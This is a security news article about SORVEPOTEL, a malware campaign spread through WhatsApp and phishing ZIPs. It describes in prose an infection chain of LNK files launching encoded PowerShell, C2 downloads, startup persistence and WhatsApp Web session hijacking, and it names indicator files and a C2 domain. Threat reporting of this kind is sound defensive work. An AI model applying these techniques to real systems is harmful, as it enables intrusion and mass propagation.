Enterprise networks worldwide are facing an aggressive, self-propagating malware campaign that exploits WhatsApp as its primary delivery mechanism.
First observed in early September 2025 targeting Brazilian organizations, SORVEPOTEL spreads through convincing phishing messages carrying malicious ZIP attachments.
Upon execution, the malware not only establishes a foothold on the host system but also hijacks active WhatsApp Web sessions to replicate itself across all contacts and groups associated with the compromised account.
This unprecedented blend of social engineering and automated propagation has elevated SORVEPOTEL into a significant threat for enterprises relying on messaging platforms for internal communication.
Initial reports traced the campaign to phishing messages bearing archive names such as RES-20250930112057.zip or ORCAMENTO114418.zip, masquerading as innocuous documents like receipts or budgets.
These messages prompt users to “baixa o zip no PC e abre” (download the ZIP on PC and open it), explicitly targeting desktop sessions to maximize enterprise impact.
Trend Micro analysts identified that an alternative infection vector involves phishing emails distributing similarly named ZIP attachments, often appearing to originate from trusted institutions with subjects like “ComprovanteSantander-75319981.682657420.zip.”
Once the ZIP is extracted, the victim encounters a deceptive Windows shortcut (.LNK) file designed to launch a hidden PowerShell script, which downloads and executes the primary payload from attacker-controlled domains.
Attack Chain
As the .LNK file executes, it invokes an encoded command that launches a batch script in a concealed window.
.webp)
This attack chain illustrates the encrypted command line within the shortcut that leverages the PowerShell Invoke-Expression (IEX) function with the -enc parameter for payload obfuscation.
This script retrieves a secondary batch file payload and establishes persistence by copying itself into the Windows Startup folder.
Through a series of Base64-encoded PowerShell commands, the malware generates URLs pointing to command-and-control (C2) servers and uses Net.WebClient to fetch additional components, which are then executed in memory.
The decrypted command inside the batch file connects to the C2 infrastructure. By employing typo-squatted domains such as sorvetenopotel.com (a play on the Portuguese phrase “sorvete no pote”), the attackers blend malicious traffic with legitimate network flows, evading basic detection mechanisms.
Once persistence is in place, the malware scans for active WhatsApp Web sessions. Upon locating an authenticated session, SORVEPOTEL automatically propagates the same malicious ZIP across all contacts and groups.
This automated spam not only multiplies infection rates but often results in compromised accounts being banned for violating WhatsApp’s terms of service.
By combining social engineering, script-based execution, and rapid session hijacking, SORVEPOTEL demonstrates a novel escalation in messaging-platform attacks.
The malware’s focus on widespread distribution rather than immediate data theft underscores a shift toward maximizing reach and operational disruption.
Organizations should enforce strict endpoint policies to block unauthorized shortcuts, disable auto-download features in messaging applications, and conduct regular user awareness training to mitigate the evolving risk posed by self-propagating threats like SORVEPOTEL.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
